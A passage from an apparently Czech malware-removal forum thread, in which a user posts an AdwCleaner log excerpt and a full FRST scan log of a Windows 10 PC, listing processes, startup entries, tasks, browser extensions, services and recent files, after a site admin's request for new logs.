Deleted MyStart Search
Deleted MyStart Search
Deleted Search the web (Babylon)
Deleted Search the web (Babylon)
Deleted default-search.net
Deleted default-search.net
Deleted default-search.net
Deleted default-search.net
Not Deleted WebSearch

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [2186 octets] - [20/01/2021 16:59:03]
AdwCleaner[C00].txt - [2094 octets] - [20/01/2021 16:59:29]
AdwCleaner[S01].txt - [2027 octets] - [20/01/2021 17:10:25]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C01].txt ##########

Rudy
Site Admin
Posts: 118371
Registered: 30 Oct 2003 13:42
Location: Plzeň

Re: Please check my log

#4 Post by Rudy »

Post new FRST+Addition logs.

chenny
Visitor
Posts: 36
Registered: 06 Sep 2007 09:50

Re: Please check my log

#5 Post by chenny »

FRST log

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-01-2021
Ran by IRENA-PC (administrator) on IRENA-PC (20-01-2021 18:40:54)
Running from C:\Users\IRENA-PC\Desktop
Loaded Profiles: IRENA-PC
Platform: Windows 10 Pro Version 2004 19041.746 (X64) Language: Čeština (Česko)
Default browser: Chrome
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Firebit OU -> Rainmeter) C:\Program Files\Rainmeter\Rainmeter.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
(Open Source Developer, Robin Krom -> Greenshot) C:\Program Files\Greenshot\Greenshot.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(VIA Technologies Inc. -> VIA Technologies, Inc.) C:\Windows\System32\ViakaraokeSrv.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Greenshot] => C:\Program Files\Greenshot\Greenshot.exe [527792 2017-01-28] (Open Source Developer, Robin Krom -> Greenshot)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Adobe Reader Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe [5491248 2020-12-07] (Adobe Inc. -> Adobe Systems Incorporated)
HKLM\...\Print\Monitors\us008 Langmon: C:\WINDOWS\system32\us008lm.dll [31256 2016-02-15] (Microsoft Windows Hardware Compatibility Publisher -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Poslat do aplikace OneNote.lnk [2017-11-14]
ShortcutTarget: Poslat do aplikace OneNote.lnk -> C:\Program Files\Microsoft Office\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rainmeter.lnk [2019-10-05]
ShortcutTarget: Rainmeter.lnk -> C:\Program Files\Rainmeter\Rainmeter.exe (Firebit OU -> Rainmeter)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0F781840-4995-487B-B8DB-7FF1EBC5C707} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [693216 2021-01-07] (Mozilla Corporation -> Mozilla Foundation)
Task: {10E62E26-1578-4A0E-8611-FFDA4C61A221} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {21567792-F593-4A2B-A8B0-FD12215C4505} - System32\Tasks\PrivaZer_SkipUAC => C:\Program Files (x86)\PrivaZer\PrivaZer.exe [19999848 2021-01-09] (Goversoft LLC -> Goversoft LLC)
Task: {2765CE0A-1B19-47DC-BC12-CDD903EF335B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {64EFD4BD-F0D7-4F88-AE46-F5DA6CEA8254} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {87D9290F-3525-4C2A-BBCB-0D49A626C8EE} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {8E9C0AAA-5D6D-45B9-8856-FD83EA5BEDC6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9567EB88-214D-4752-88E7-2B395BCEA8D3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EB806155-3D2A-4177-A203-0FD110F04427} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
Task: {F4FC8779-698F-4176-95A0-5286A8AEA159} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{3ca49153-5896-4467-b2d9-205cc451433b}: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{6275ca9c-c816-47f0-8729-a3236c979e44}: [DhcpNameServer] 192.168.0.1 1.1.1.1

Edge:
=======
DownloadDir: C:\Users\IRENA-PC\Downloads
Edge DefaultProfile: Default
Edge Profile: C:\Users\IRENA-PC\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-20]

FireFox:
========
FF DefaultProfile: woy2c7nl.default-1506939824614
FF ProfilePath: C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 [2021-01-20]
FF Homepage: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://www.seznam.cz/
FF Notifications: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://sktorrent.os.tc; hxxps://kryptomagazin.cz
FF NewTabOverride: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> Disabled: {672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}
FF Extension: (HLS Video Download) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\@hls.video.download.xpi [2021-01-05]
FF Extension: (Download with Ant Download Manager) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\antffw@antdownloadmanager.com.xpi [2021-01-05]
FF Extension: (Avast Online Security) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\wrc@avast.com.xpi [2020-06-19]
FF Extension: (Video Downloader for FireFox) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}.xpi [2021-01-05]
FF Extension: (KITVideofy) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{6c09ef97-fbbc-4dc1-bc9a-777b216f1303}.xpi [2021-01-05]
FF Extension: (Plná Peněženka Lištička Lite) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{85d8e8cc-273a-4845-a75b-4b44377c703c}.xpi [2021-01-13]
FF Extension: (Video DownloadHelper) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2020-12-16]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @java.com/DTPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\dtplugin\npDeployJava1.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\plugin2\npjp2.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default [2021-01-20]
CHR DownloadDir: D:\Filmy\Seriály\Telenovely
CHR Notifications: Default -> hxxps://app.expertoption.com; hxxps://app.plus500.com; hxxps://calendar.google.com; hxxps://findmedia.biz; hxxps://ganesha.goodly.pro; hxxps://gofesm.com; hxxps://kryptomagazin.sk; hxxps://my.jdownloader.org; hxxps://prokliky.cz; hxxps://solvena.ru; hxxps://thestreetlottery.com; hxxps://trading11.com; hxxps://watch-video.net; hxxps://www.facebook.com; hxxps://www.nej-ceny.cz; hxxps://www.netflix.com; hxxps://www.publish0x.com; hxxps://www.youtube.com; hxxps://zignaly.com
CHR HomePage: Default -> hxxps://www.seznam.cz/
CHR StartupUrls: Default -> "hxxp://seznam.cz/","hxxp://www.google.cz/","hxxps://www.google.com ... oogle.com/"
CHR Extension: (Easy Auto Refresh) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aabcgdmkeabbnleenpncegpcngjpnjkc [2019-07-01]
CHR Extension: (Seznam doplněk - Esko-) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blmojkbhnkkphngknkmgccmlenfaelkd [2019-10-08]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-01-30]
CHR Extension: (Aliexpress SuperStar česky, Historie cen a koruny) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ciclollkolafellcaolgccmfjldgpolo [2020-04-19]
CHR Extension: (YouTube Music) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cinhimbnkkaeohfgghhklpknlkffjgod [2021-01-14]
CHR Extension: (Image Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnpniohnfphhjihaiiggeabnkjhpaldj [2019-01-27]
CHR Extension: (ZenMate - IP & Browser Check) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\dchhalahcjpkabdgonjhoogdcipienhf [2017-01-30]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\egjdagpondeapnnockkjcocjdkfkffnb [2021-01-14]
CHR Extension: (Přehrávání | SledovaniTV.cz) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gccmmlklnkpaihbmbpcdknammjmmdocb [2021-01-14]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2021-01-15]
CHR Extension: (Stream Video Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-16]
CHR Extension: (Hangouts Google) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nckgahadagoaajjgafhacjanaoiihapd [2020-08-13]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (SS TV Remote) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\npciacphlpgklgcjgiamnmfjipjdkacf [2020-03-23]
CHR Extension: (Gmail) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-25]
CHR Extension: (Chrome Media Router) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-12-09]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-01-20]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\System Profile [2021-01-20]
CHR HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]

Brave:
=======
BRA Profile: C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default [2021-01-20]
BRA Extension: (McAfee® WebAdvisor) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm\2.0.673 [2019-02-09]
BRA Extension: (Brave Local Data Files Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal [2019-02-09]
BRA Extension: (Brave Ad Block Updater (Default)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cffkpbalmllkdoenhmdmpbkajipdjfam [2019-02-23]
BRA Extension: (Brave Tor Client Updater (Windows)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cpoalefficncklhjfpglfiplenlpccdb [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm [2019-02-09]
BRA Extension: (Brave Ad Block Updater (CZE, SVK: EasyList Czech and Slovak)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\omkkefoeihpbpebhhbhmjekpnegokpbj [2019-02-23]
BRA Extension: (Brave HTTPS Everywhere Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oofiananboodjbbmdelgdommihjbkfag [2019-02-09]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5198064 2021-01-13] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13172752 2020-01-22] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R2 VIAKaraokeService; C:\WINDOWS\system32\viakaraokesrv.exe [36504 2015-06-22] (VIA Technologies Inc. -> VIA Technologies, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
S3 e2eVAWdm; C:\WINDOWS\System32\drivers\VAud_WDM.sys [112696 2017-07-12] (ARTRAY CO., LTD. -> e2eSoft)
R2 npf; C:\WINDOWS\system32\drivers\npf.sys [36600 2018-12-07] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
R3 nuviocir; C:\WINDOWS\system32\DRIVERS\nuviocir_x64.sys [40464 2015-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Nuvoton Technology Corp.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-01-20 18:40 - 2021-01-20 18:41 - 000020181 _____ C:\Users\IRENA-PC\Desktop\FRST.txt
2021-01-20 16:58 - 2021-01-20 16:59 - 000000000 ____D C:\AdwCleaner
2021-01-20 16:57 - 2021-01-20 16:55 - 008458096 _____ (Malwarebytes) C:\Users\IRENA-PC\Desktop\adwcleaner_8.0.9.exe
2021-01-20 09:32 - 2017-07-12 23:48 - 000112696 _____ (e2eSoft) C:\WINDOWS\system32\Drivers\VAud_WDM.sys
2021-01-20 09:02 - 2021-01-20 09:03 - 000433944 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-01-20 08:46 - 2021-01-20 08:46 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\GlarySoft
2021-01-20 08:45 - 2021-01-20 09:01 - 000000000 ____D C:\ProgramData\GlarySoft
2021-01-20 08:45 - 2021-01-20 09:01 - 000000000 ____D C:\Program Files (x86)\Glarysoft
2021-01-20 08:16 - 2021-01-20 10:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GridinSoft Anti-Malware
2021-01-20 08:16 - 2021-01-20 08:16 - 000000000 ____D C:\ProgramData\GridinSoft
2021-01-20 07:13 - 2021-01-20 18:05 - 000000000 ____D C:\Users\IRENA-PC\Desktop\FRST-OlderVersion
2021-01-14 04:09 - 2021-01-14 04:09 - 000000000 ___RD C:\Users\IRENA-PC\ODBA
2021-01-13 21:51 - 2021-01-13 21:51 - 000581120 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000467968 _____ C:\WINDOWS\system32\AssignedAccessCsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000234496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000157184 _____ C:\WINDOWS\system32\uwfcsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000138056 _____ C:\WINDOWS\system32\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VBICodec.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000101704 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000095744 _____ C:\WINDOWS\system32\VirtualMonitorManager.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000729600 _____ (Microsoft Corporation) C:\WINDOWS\system32\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000455680 _____ C:\WINDOWS\SysWOW64\WindowManagementAPI.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000446976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\intl.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\VBICodec.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000067072 _____ C:\WINDOWS\system32\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000053760 _____ C:\WINDOWS\SysWOW64\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000010894 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-01-13 21:49 - 2021-01-13 21:49 - 002254336 _____ C:\WINDOWS\system32\dwmscene.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001333760 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001162240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2021-01-13 21:49 - 2021-01-13 21:49 - 000643072 _____ C:\WINDOWS\system32\WindowManagementAPI.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000544768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2021-01-13 21:49 - 2021-01-13 21:49 - 000330752 _____ C:\WINDOWS\SysWOW64\ssdm.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\intl.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000235520 _____ C:\WINDOWS\SysWOW64\HeatCore.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000190976 _____ C:\WINDOWS\system32\BthpanContextHandler.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000182272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\timedate.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000152064 _____ C:\WINDOWS\system32\EoAExperiences.exe
2021-01-13 21:48 - 2021-01-13 21:48 - 002260992 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2021-01-13 21:48 - 2021-01-13 21:48 - 000306688 _____ C:\WINDOWS\system32\HeatCore.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2021-01-13 21:43 - 2021-01-13 21:43 - 000455168 _____ C:\WINDOWS\system32\ssdm.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\timedate.cpl
2021-01-13 21:43 - 2021-01-13 21:43 - 000165888 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
